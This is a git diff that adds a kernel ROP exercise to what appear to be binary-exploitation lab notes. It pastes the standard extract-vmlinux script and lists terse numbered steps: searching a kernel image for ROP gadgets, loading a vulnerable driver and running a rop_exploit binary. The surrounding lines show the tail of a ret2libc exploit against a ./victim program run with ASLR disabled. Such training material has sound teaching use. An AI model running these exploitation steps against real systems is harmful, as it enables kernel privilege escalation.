Update ejemplo_centennial

diff --git a/ejemplo_centennial b/ejemplo_centennial
--- a/ejemplo_centennial
+++ b/ejemplo_centennial
@@ -32,6 +32,71 @@ for i in $(find / -executable -type f);do file -i $i | grep -i 'x-executable; ch
 a. readelf -S -W ~/examples/samplecode/info
 
 b. readelf -p .text ~/examples/samplecode/info
+========================================================
+Exercise 9: Linux Kernel ROP and ROPgadget
+
+!/bin/sh
+# SPDX-License-Identifier: GPL-2.0-only
+# ----------------------------------------------------------------------
+# extract-vmlinux - Extract uncompressed vmlinux from a kernel image
+#
+# Inspired from extract-ikconfig
+# (c) 2009,2010 Dick Streefland <dick@streefland.net>
+#
+# (c) 2011      Corentin Chary <corentin.chary@gmail.com>
+#
+# ----------------------------------------------------------------------
+
+check_vmlinux()
+{
+    # Use readelf to check if it's a valid ELF
+    # TODO: find a better to way to check that it's really vmlinux
+    #       and not just an elf
+    readelf -h $1 > /dev/null 2>&1 || return 1
+    cat $1
+    exit 0
+}
+
+try_decompress()
+{
+    # The obscure use of the "tr" filter is to work around older versions of
+    # "grep" that report the byte offset of the line instead of the pattern.
+    # Try to find the header ($1) and decompress from here
+    for    pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
+    do
+        pos=${pos%%:*}
+        tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
+        check_vmlinux $tmp
+    done
+}
+
+# Check invocation:
+me=${0##*/}
+img=$1
+if    [ $# -ne 1 -o ! -s "$img" ]
+then
+    echo "Usage: $me <kernel-image>" >&2
+    exit 2
+fi
+
+# Prepare temp files:
+tmp=$(mktemp /tmp/vmlinux-XXX)
+trap "rm -f $tmp" 0
+
+# That didn't work, so retry after decompression.
+try_decompress '\037\213\010' xy    gunzip
+try_decompress '\3757zXZ\000' abcde unxz
+try_decompress 'BZh'          xy    bunzip2
+try_decompress '\135\0\0\0'   xxx   unlzma
+try_decompress '\211\114\132' xy    'lzop -d' 
+try_decompress '\002!L\030'   xxx   'lz4 -d'
+try_decompress '(\265/\375'   xxx   unzstd
+
+# Finally check for uncompressed images or objects:
+check_vmlinux $img
+
+# Bail out:
+echo "$me: Cannot find vmlinux." >&2
 
 c. readelf -x .text -W ~/examples/samplecode/info
 
@@ -150,3 +215,38 @@ printf %016x $((base+system)) | tac -rs..
 printf %016x $((base+exit)) | tac -rs..
 echo
 ) | xxd -r -p ; cat) | setarch `arch` -R ./victim
+
+
+sudo ./extract-vmlinux /boot/vmlinuz-3.13.0-32-generic > vmlinux.
+
+a. 0f 94 c3; sete %bl
+
+b. 94 c3; xchg eax, esp; ret
+
+./ROPgadget.py --binary ~/Downloads/vmlinux > ~/ropgadget.
+
+ pop %rdi; ret:
+ 
+  grep ': pop rdi ; ret' ~/ropgadget.
+  
+make && sudo insmod ./drv.ko
+
+
+37.-
+
+ cat ~/ropgadget | grep ': xchg eax, esp ; ret' > gadgets
+ 
+ 40.- 
+ 
+ objdump -j .text -d ~/Downloads/vmlinux | grep iretq | head -1.
+ 
+ 43.-
+ 
+  dmesg | grep addr | grep ops.
+  
+  44.-
+  
+  ~/find_offset.py ffffffffa02e9340 ~/gadgets.
+ 45.-
+ 
+  ./rop_exploit 18446744073644231139 ffffffffa02e9340. 
